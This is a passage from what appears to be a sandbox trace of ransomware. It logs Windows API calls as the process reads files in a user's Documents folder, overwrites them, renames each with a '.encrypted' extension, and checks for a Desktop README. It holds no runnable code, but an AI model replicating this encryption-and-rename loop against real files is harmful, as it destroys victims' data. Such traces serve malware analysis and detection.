halpmcxz\\documents\\mjkxv.pptx"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12b6c3b0, ftCreationTime.dwHighDateTime=0x1d55cf8, ftLastAccessTime.dwLowDateTime=0xb144db60, ftLastAccessTime.dwHighDateTime=0x1d59c0f, ftLastWriteTime.dwLowDateTime=0x41beb360, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0xda00)) returned 1 [0152.310] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0152.310] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mjKxv.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mjkxv.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mjKxv.pptx.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mjkxv.pptx.encrypted")) returned 1 [0152.312] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ndCXgWoaW3O_s9.doc", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ndCXgWoaW3O_s9.doc", lpFilePart=0x0) returned 0x3a [0152.312] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0152.312] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ndCXgWoaW3O_s9.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ndcxgwoaw3o_s9.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.312] GetFileType (hFile=0x4d0) returned 0x1 [0152.312] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0152.312] GetFileType (hFile=0x4d0) returned 0x1 [0152.312] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0x116b5 [0152.313] ReadFile (in: hFile=0x4d0, lpBuffer=0x26d2b80, nNumberOfBytesToRead=0x116b5, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x26d2b80*, lpNumberOfBytesRead=0x2ee894*=0x116b5, lpOverlapped=0x0) returned 1 [0152.374] CloseHandle (hObject=0x4d0) returned 1 [0152.392] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0152.392] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0152.392] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0152.392] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0152.392] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ndCXgWoaW3O_s9.doc", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ndCXgWoaW3O_s9.doc", lpFilePart=0x0) returned 0x3a [0152.392] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0152.392] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ndCXgWoaW3O_s9.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ndcxgwoaw3o_s9.doc"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.393] GetFileType (hFile=0x4d0) returned 0x1 [0152.393] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0152.393] GetFileType (hFile=0x4d0) returned 0x1 [0152.393] WriteFile (in: hFile=0x4d0, lpBuffer=0x2753d84*, nNumberOfBytesToWrite=0x116c0, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x2753d84*, lpNumberOfBytesWritten=0x2ee884*=0x116c0, lpOverlapped=0x0) returned 1 [0152.395] CloseHandle (hObject=0x4d0) returned 1 [0152.396] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ndCXgWoaW3O_s9.doc", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ndCXgWoaW3O_s9.doc", lpFilePart=0x0) returned 0x3a [0152.396] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ndCXgWoaW3O_s9.doc.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ndCXgWoaW3O_s9.doc.encrypted", lpFilePart=0x0) returned 0x44 [0152.397] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0152.397] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ndCXgWoaW3O_s9.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ndcxgwoaw3o_s9.doc"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d2692b0, ftCreationTime.dwHighDateTime=0x1d5dc22, ftLastAccessTime.dwLowDateTime=0xb246da30, ftLastAccessTime.dwHighDateTime=0x1d5e41d, ftLastWriteTime.dwLowDateTime=0x41ccfba0, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x116c0)) returned 1 [0152.397] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0152.397] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ndCXgWoaW3O_s9.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ndcxgwoaw3o_s9.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ndCXgWoaW3O_s9.doc.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ndcxgwoaw3o_s9.doc.encrypted")) returned 1 [0152.398] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Nhxbjjn.pptx", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Nhxbjjn.pptx", lpFilePart=0x0) returned 0x34 [0152.398] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0152.398] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Nhxbjjn.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhxbjjn.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.398] GetFileType (hFile=0x4d0) returned 0x1 [0152.398] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0152.398] GetFileType (hFile=0x4d0) returned 0x1 [0152.398] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0x691d [0152.398] ReadFile (in: hFile=0x4d0, lpBuffer=0x276595c, nNumberOfBytesToRead=0x691d, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x276595c*, lpNumberOfBytesRead=0x2ee894*=0x691d, lpOverlapped=0x0) returned 1 [0152.417] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0152.417] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0152.417] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0152.417] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0152.417] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Nhxbjjn.pptx", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Nhxbjjn.pptx", lpFilePart=0x0) returned 0x34 [0152.417] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0152.417] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Nhxbjjn.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhxbjjn.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.418] GetFileType (hFile=0x4d0) returned 0x1 [0152.418] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0152.418] GetFileType (hFile=0x4d0) returned 0x1 [0152.418] WriteFile (in: hFile=0x4d0, lpBuffer=0x27d34ac*, nNumberOfBytesToWrite=0x6920, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x27d34ac*, lpNumberOfBytesWritten=0x2ee884*=0x6920, lpOverlapped=0x0) returned 1 [0152.420] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Nhxbjjn.pptx", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Nhxbjjn.pptx", lpFilePart=0x0) returned 0x34 [0152.420] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Nhxbjjn.pptx.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Nhxbjjn.pptx.encrypted", lpFilePart=0x0) returned 0x3e [0152.420] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0152.420] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Nhxbjjn.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhxbjjn.pptx"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ca82830, ftCreationTime.dwHighDateTime=0x1d5d995, ftLastAccessTime.dwLowDateTime=0x8df1c010, ftLastAccessTime.dwHighDateTime=0x1d5e0de, ftLastWriteTime.dwLowDateTime=0x41d1be60, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x6920)) returned 1 [0152.420] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0152.420] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Nhxbjjn.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhxbjjn.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Nhxbjjn.pptx.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhxbjjn.pptx.encrypted")) returned 1 [0152.422] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nxK5u36q93ybBp9Qf.pptx", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nxK5u36q93ybBp9Qf.pptx", lpFilePart=0x0) returned 0x3e [0152.422] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0152.422] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nxK5u36q93ybBp9Qf.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nxk5u36q93ybbp9qf.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.423] GetFileType (hFile=0x4d0) returned 0x1 [0152.423] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0152.423] GetFileType (hFile=0x4d0) returned 0x1 [0152.423] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0x122e9 [0152.424] ReadFile (in: hFile=0x4d0, lpBuffer=0x27da2d0, nNumberOfBytesToRead=0x122e9, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x27da2d0*, lpNumberOfBytesRead=0x2ee894*=0x122e9, lpOverlapped=0x0) returned 1 [0152.453] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0152.453] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0152.453] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0152.453] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0152.453] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nxK5u36q93ybBp9Qf.pptx", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nxK5u36q93ybBp9Qf.pptx", lpFilePart=0x0) returned 0x3e [0152.453] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0152.453] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nxK5u36q93ybBp9Qf.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nxk5u36q93ybbp9qf.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.454] GetFileType (hFile=0x4d0) returned 0x1 [0152.454] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0152.454] GetFileType (hFile=0x4d0) returned 0x1 [0152.454] WriteFile (in: hFile=0x4d0, lpBuffer=0x225926c*, nNumberOfBytesToWrite=0x122f0, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x225926c*, lpNumberOfBytesWritten=0x2ee884*=0x122f0, lpOverlapped=0x0) returned 1 [0152.456] CloseHandle (hObject=0x4d0) returned 1 [0152.457] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nxK5u36q93ybBp9Qf.pptx", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nxK5u36q93ybBp9Qf.pptx", lpFilePart=0x0) returned 0x3e [0152.457] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nxK5u36q93ybBp9Qf.pptx.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nxK5u36q93ybBp9Qf.pptx.encrypted", lpFilePart=0x0) returned 0x48 [0152.457] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0152.458] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nxK5u36q93ybBp9Qf.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nxk5u36q93ybbp9qf.pptx"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81b50e70, ftCreationTime.dwHighDateTime=0x1d55c85, ftLastAccessTime.dwLowDateTime=0x15a3a600, ftLastAccessTime.dwHighDateTime=0x1d57608, ftLastWriteTime.dwLowDateTime=0x41d68120, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x122f0)) returned 1 [0152.458] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0152.458] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nxK5u36q93ybBp9Qf.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nxk5u36q93ybbp9qf.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nxK5u36q93ybBp9Qf.pptx.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nxk5u36q93ybbp9qf.pptx.encrypted")) returned 1 [0152.459] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\O02lgMZZQSqmUq.pptx", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\O02lgMZZQSqmUq.pptx", lpFilePart=0x0) returned 0x3b [0152.459] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0152.459] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\O02lgMZZQSqmUq.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\o02lgmzzqsqmuq.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.459] GetFileType (hFile=0x4d0) returned 0x1 [0152.459] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0152.459] GetFileType (hFile=0x4d0) returned 0x1 [0152.459] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0x1133c [0152.459] ReadFile (in: hFile=0x4d0, lpBuffer=0x226bab4, nNumberOfBytesToRead=0x1133c, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x226bab4*, lpNumberOfBytesRead=0x2ee894*=0x1133c, lpOverlapped=0x0) returned 1 [0152.461] CloseHandle (hObject=0x4d0) returned 1 [0152.503] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0152.503] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0152.503] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0152.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0152.503] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\O02lgMZZQSqmUq.pptx", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\O02lgMZZQSqmUq.pptx", lpFilePart=0x0) returned 0x3b [0152.503] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0152.503] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\O02lgMZZQSqmUq.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\o02lgmzzqsqmuq.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.504] GetFileType (hFile=0x4d0) returned 0x1 [0152.504] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0152.504] GetFileType (hFile=0x4d0) returned 0x1 [0152.504] WriteFile (in: hFile=0x4d0, lpBuffer=0x22ec390*, nNumberOfBytesToWrite=0x11340, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x22ec390*, lpNumberOfBytesWritten=0x2ee884*=0x11340, lpOverlapped=0x0) returned 1 [0152.506] CloseHandle (hObject=0x4d0) returned 1 [0152.507] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\O02lgMZZQSqmUq.pptx", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\O02lgMZZQSqmUq.pptx", lpFilePart=0x0) returned 0x3b [0152.507] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\O02lgMZZQSqmUq.pptx.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\O02lgMZZQSqmUq.pptx.encrypted", lpFilePart=0x0) returned 0x45 [0152.507] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0152.507] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\O02lgMZZQSqmUq.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\o02lgmzzqsqmuq.pptx"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1045a0, ftCreationTime.dwHighDateTime=0x1d5d784, ftLastAccessTime.dwLowDateTime=0x4d9e1930, ftLastAccessTime.dwHighDateTime=0x1d5b76e, ftLastWriteTime.dwLowDateTime=0x41dda540, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x11340)) returned 1 [0152.508] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0152.508] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\O02lgMZZQSqmUq.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\o02lgmzzqsqmuq.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\O02lgMZZQSqmUq.pptx.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\o02lgmzzqsqmuq.pptx.encrypted")) returned 1 [0152.516] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OPMjP99y.xlsx", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OPMjP99y.xlsx", lpFilePart=0x0) returned 0x35 [0152.516] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0152.517] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OPMjP99y.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\opmjp99y.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.517] GetFileType (hFile=0x4d0) returned 0x1 [0152.517] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0152.517] GetFileType (hFile=0x4d0) returned 0x1 [0152.517] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0x44fa [0152.517] ReadFile (in: hFile=0x4d0, lpBuffer=0x22fdbe8, nNumberOfBytesToRead=0x44fa, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x22fdbe8*, lpNumberOfBytesRead=0x2ee894*=0x44fa, lpOverlapped=0x0) returned 1 [0152.518] CloseHandle (hObject=0x4d0) returned 1 [0152.532] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0152.532] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0152.533] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0152.533] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0152.533] 